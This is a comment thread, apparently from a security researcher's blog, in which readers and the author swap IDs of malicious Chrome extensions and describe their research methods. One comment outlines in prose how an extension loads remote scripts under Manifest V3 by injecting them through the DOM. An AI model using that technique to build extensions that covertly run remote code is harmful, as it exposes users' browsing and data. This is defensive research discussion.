mopfodolajhbl|jpefmbpcbebpjpmelobfakahfdcgcmkl|khdnaopfklkdcloiinccnaflffmfcioa|kjgkmceledmpdnmgmppiekdbnamccdjp|laameccjpleogmfhilmffpdbiibgbekf|lagdcjmbchphhndlbpfajelapcodekll|lbohagbplppjcpllnhdichjldhfgkicb|ledkggjjapdgojgihnaploncccgiadhg|lgecddhfcfhlmllljooldkbbijdcnlpe|lkahpjghmdhpiojknppmlenngmpkkfma|lkciiknpgglgbbcgcpbpobjabglmpkle|lkhhagecaghfakddbncibijbjmgfhfdm|lknpbgnookklokdjomiildnlalffjmma|lojpdfjjionbhgplcangflkalmiadhfi|mdkiofbiinbmlblcfhfjgmclhdfikkpm|meffljleomgifbbcffejnmhjagncfpbd|mejjgaogggabifjfjdbnobinfibaamla|mhpcabliilgadobjpkameggapnpeppdg|mkjjckchdfhjbpckippbnipkdnlidbeb|mldaiedoebimcgkokmknonjefkionldi|mlkjjjmhjijlmafgjlpkiobpdocdbncj|mndiaaeaiclnmjcnacogaacoejchdclp|mnlohknjofogcljbcknkakphddjpijak|nhnfcgpcbfclhfafjlooihdfghaeinfc|ninecedhhpccjifamhafbdelibdjibgd|nmigaijibiabddkkmjhlehchpmgbokfj|npdkkcjlmhcnnaoobfdjndibfkkhhdfn|oakbcaafbicdddpdlhbchhpblmhefngh|obdhcplpbliifflekgclobogbdliddjd|ocginjipilabheemhfbedijlhajbcabh|oepjogknopbbibcjcojmedaepolkghpb|ofpnikijgfhlmmjlpkfaifhhdonchhoi|ogadflejmplcdhcldlloonbiekhnlopp|ogfjgagnmkiigilnoiabkbbajinanlbn|okkffdhbfplmbjblhgapnchjinanmnij|oodkhhminilgphkdofffddlgopkgbgpm|pegfdldddiilihjahcpdehhhfcbibipg|phfkifnjcmdcmljnnablahicoabkokbg|phjbepamfhjgjdgmbhmfflhnlohldchb|pjbgfifennfhnbkhoidkdchbflppjncb|plmlopfeeobajiecodiggabcihohcnge|pmilcmjbofinpnbnpanpdadijibcgifc|pmnphobdokkajkpbkajlaiooipfcpgio|pnanegnllonoiklmmlegcaajoicfifcm|pnlphjjfielecalmmjjdhjjninkbjdod|pooaemmkohlphkekccfajnbcokjlbehk)'

  • tmr

    I'm curious how to find these malicious programs, is there any trick? I am also doing research in this area, share a malicious program I found, this is its id fmlpbbognkocpajihchioognkmdeeldo There is also a lot of fake users to improve the ranking, and there is even loaded remote code execution, even though it is manifest v3 It uses dom api in content js to inject self script (manifest v3 csp allows this behavior), and in self script again uses dom api to inject remote script (depending on the current website csp) The detailed report is here, https://blog.xlab.app/p/1e632d6d/ Sorry this is written in Chinese, and the English version has not been written yet, you may need to read it with Google Translate It is worth mentioning that I basically learned all my security skills about chrome extensions from your blog, thank you very much

    Wladimir Palant

    I’m mostly finding them accidentally, just like you. I do scrape Chrome Web Store occasionally however, so I have manifests of >50k extensions, allowing me to search for unusual patterns (see https://github.com/palant/chrome-extension-manifests-dataset). I also have a database locally with the text of ~1,600 extensions, allowing me to search for any code patterns. In particular, that background proxy in the malicious extension you found: it’s also present in igkkmokkmlbkkgdnkkancbonkbbmkioc and lopnbnfpjmgpbppclhclehhgafnifija.

  • Arc

    One of the perks of Edge browser is that its easy to convert Chrome extension into Edge. So our malicious translator plugin works there too - mdbngpgblembhpfoinlmpadondopfhlf :) By the way Google is notoriously known for ignoring extension removal requests. Working for an AV company doesnt seem to have any special effect too. I gave up reporting mal. extensions to them a long time ago. Kudos to your work by the way, browser JS is often a f*** mess.

  • Charlotte

    Oh wow, this is quite interesting. I've been researching malicious Chrome extensions for a while now myself, though I've pretty much been doing it entirely manually as I don't have much experience in programming. Do you have any tools you use to automate the process of searching through extensions for stuff like this?

    Wladimir Palant

    I’ve been doing it mostly manually as well. I have my collection of extension manifests (https://github.com/palant/chrome-extension-manifests-dataset), and for this research I also downloaded the more popular extensions and put them into an SQLite database so that I could run full-text searches. But that’s it.

  • Chase

    Curious how pjbgfifennfhnbkhoidkdchbflppjncb is malicious? I was personally using this one, any precautions I should take?

    Wladimir Palant

    It did not seem malicious at the point of writing, it merely shared some coding approaches with other extensions which were (same developers). Most likely, this extension is supposed to accumulate users before the developers turn it malicious. Which is quite a concern for an extension with access to all websites.

    I’d recommend removing it but your risk aversion might be different than mine.